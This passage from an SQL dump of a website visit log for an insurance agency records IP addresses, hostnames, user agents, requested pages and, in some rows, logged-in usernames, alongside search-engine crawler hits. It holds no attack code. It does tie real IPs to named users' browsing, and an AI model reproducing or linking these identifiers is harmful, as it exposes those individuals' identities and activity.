+http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5124,'0b_03fb785fb60e9e35e87d6e78ef915054','1458066785','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(5127,'0b_b71938834d66ead5f6a9fa6838b56432','1458066788','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1364 x 768','','','','roisy','','0','51',0),(5129,'0b_92c0d6fa85d3619840f94abb4a3ea58e','1458066810','54.193.56.86','ec2-54-193-56-86.us-west-1.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5130,'0b_92c0d6fa85d3619840f94abb4a3ea58e','1458066810','54.193.56.86','ec2-54-193-56-86.us-west-1.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5132,'0b_b1594e42892da5880444bdd0c623dcaa','1458066887','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(5133,'0b_93394bccf596d261462f8916871b367e','1458066888','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','0',0),(5135,'0b_93394bccf596d261462f8916871b367e','1458066889','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','0',0),(5136,'0b_93394bccf596d261462f8916871b367e','1458066896','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','0',0),(5139,'0b_3b841b7ff0eea513032863a84a243e97','1458066912','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5142,'0b_3b841b7ff0eea513032863a84a243e97','1458066913','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5145,'0b_3b841b7ff0eea513032863a84a243e97','1458066916','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5148,'0b_ae31da506f2f647084b9f49c7c0427bb','1458067604','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5150,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458068752','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1920 x 1080','Google','','','','','0','0',0),(5153,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458068754','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5156,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458068768','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5157,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458069040','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5160,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458069060','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5163,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458069060','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5166,'0b_30dac62952db018d9d2e4d2e6d7bc61a','1458069290','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5168,'0b_febecfb4b06268032fa15074877a9bf7','1458069620','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5169,'0b_febecfb4b06268032fa15074877a9bf7','1458069621','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5171,'0b_febecfb4b06268032fa15074877a9bf7','1458069628','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5174,'0b_febecfb4b06268032fa15074877a9bf7','1458069643','108.58.88.178','ool-6c3a58b2.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5175,'0b_febecfb4b06268032fa15074877a9bf7','1458069645','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5178,'0b_febecfb4b06268032fa15074877a9bf7','1458069649','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5180,'0b_febecfb4b06268032fa15074877a9bf7','1458069658','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5181,'0b_febecfb4b06268032fa15074877a9bf7','1458069713','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5183,'0b_febecfb4b06268032fa15074877a9bf7','1458069734','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5184,'0b_febecfb4b06268032fa15074877a9bf7','1458069782','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5187,'0b_93394bccf596d261462f8916871b367e','1458070071','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5189,'0b_93394bccf596d261462f8916871b367e','1458070071','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','0',0),(5192,'0b_93394bccf596d261462f8916871b367e','1458070076','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5195,'0b_93394bccf596d261462f8916871b367e','1458070103','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5198,'0b_93394bccf596d261462f8916871b367e','1458070106','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5199,'0b_93394bccf596d261462f8916871b367e','1458070110','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5202,'0b_93394bccf596d261462f8916871b367e','1458070128','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5205,'0b_93394bccf596d261462f8916871b367e','1458070137','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5207,'0b_93394bccf596d261462f8916871b367e','1458070165','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1366 x 768','','','','jzicher','','0','51',0),(5208,'0b_febecfb4b06268032fa15074877a9bf7','1458070264','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5210,'0b_febecfb4b06268032fa15074877a9bf7','1458070466','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5211,'0b_febecfb4b06268032fa15074877a9bf7','1458070474','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5213,'0b_febecfb4b06268032fa15074877a9bf7','1458070499','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5214,'0b_febecfb4b06268032fa15074877a9bf7','1458070499','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','0',0),(5217,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458070640','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5219,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458070650','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5220,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458070650','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5222,'0b_ce3dfd6dcb1862cd3ae04384a6e8bb89','1458070657','50.248.150.225','50-248-150-225-static.hfc.comcastbusiness.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(5223,'0b_febecfb4b06268032fa15074877a9bf7','1458070694','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(5226,'0b_febecfb4b06268032fa15074877a9bf7','1458070695','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','0',0),(5229,'0b_8824586c6ba4616559abac59018cb1d2','1458070814','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5231,'0b_8824586c6ba4616559abac59018cb1d2','1458070816','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5234,'0b_2e9f11872ed1cd3f847fb4624bc33fa1','1458070899','100.43.81.146','spider-100-43-81-146.yandex.com','/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5235,'0b_558bad299e7916e2121af44d191fcc48','1458071263','52.35.190.11','ec2-52-35-190-11.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5237,'0b_558bad299e7916e2121af44d191fcc48','1458071263','52.35.190.11','ec2-52-35-190-11.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5238,'0b_558bad299e7916e2121af44d191fcc48','1458071274','52.35.190.11','ec2-52-35-190-11.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5241,'0b_558bad299e7916e2121af44d191fcc48','1458071341','52.35.190.11','ec2-52-35-190-11.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5244,'0b_558bad299e7916e2121af44d191fcc48','1458071342','52.35.190.11','ec2-52-35-190-11.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5246,'0b_8d2b8b7df11db893cddd04e111fc3321','1458072466','100.43.91.1','spider-100-43-91-1.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5247,'0b_e460f83117f74ed47eb28e1a7817198f','1458072730','108.29.175.27','static-108-29-175-27.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(5250,'0b_e460f83117f74ed47eb28e1a7817198f','1458072731','108.29.175.27','static-108-29-175-27.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(5253,'0b_55164b72ee2dfda42ae8c39c0ad71590','1458072974','66.249.83.249,12.158.108.226','12.158.108.226','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5255,'0b_77e82ba6fefa60309e868dc2fd6e49da','1458073184','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5258,'0b_77e82ba6fefa60309e868dc2fd6e49da','1458073185','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5259,'0b_2c450a11cd443fac3f0342e25fbef0b0','1458073574','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5262,'0b_80e03b915823aba9b9719a9439f4ddec','1458073936','129.44.57.221','static-129-44-57-221.ny325.east.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(5265,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074823','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1920 x 1200','Google','','','','','0','0',0),(5267,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074827','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(5268,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074841','75.99.37.250','ool-4b6325fa.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(5271,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074849','75.99.37.250','ool-4b6325fa.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','51',0),(5273,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074854','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','51',0),(5274,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074854','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(5276,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074864','75.99.37.250','ool-4b6325fa.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','51',0),(5279,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074874','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','51',0),(5280,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074882','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','51',0),(5282,'0b_c6a7012096cfd3a00637ad634bef05f2','1458074884','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1200','','','','','','0','0',0),(5285,'0b_94939ecadf0991434835eb692ddd9deb','1458075983','141.8.143.235','spider-141-8-143-235.yandex.com','/home/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5286,'0b_b88527c64d4218e7cf9bdcd0ad160d22','1458076121','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5289,'0b_639ce813c8ab353d71b09c6e9a542474','1458076289','91.121.172.53','ks362150.kimsufi.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5291,'0b_f1047c9ce592f71d805ad831d6a34afc','1458077377','66.249.83.209,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5294,'0b_53d70eb365568956349ed6f0616cc813','1458078889','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5295,'0b_3dcdc7b0781c6acf4e8d799d0e11c1d1','1458079786','66.249.73.187','crawl-66-249-73-187.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5298,'0b_8824586c6ba4616559abac59018cb1d2','1458081258','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5301,'0b_8824586c6ba4616559abac59018cb1d2','1458081260','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5303,'0b_c6e28674f81d472c6a7e1bae23201599','1458090631','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(5306,'0b_c6e28674f81d472c6a7e1bae23201599','1458090632','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; 